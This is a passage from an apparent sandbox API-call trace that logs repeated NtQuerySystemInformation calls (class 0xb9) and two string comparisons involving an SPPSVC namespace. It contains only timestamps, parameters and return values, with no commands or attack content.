SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0240.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0240.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0240.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0240.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e880, Length=0x20, ResultLength=0x0) [0240.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0240.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0240.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0240.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0240.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.994] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0240.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0241.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0241.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0241.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0241.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0241.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0241.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0241.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0241.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0241.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0241.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0241.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0241.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.004] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0241.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0241.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0241.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0241.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0241.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0241.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0241.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0241.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0241.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0241.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0241.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0241.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0241.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0241.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0241.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0241.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0241.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0241.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0241.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0241.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0241.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0241.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.019] NtQuerySystemInformation (SystemInformationClass=0xb9, 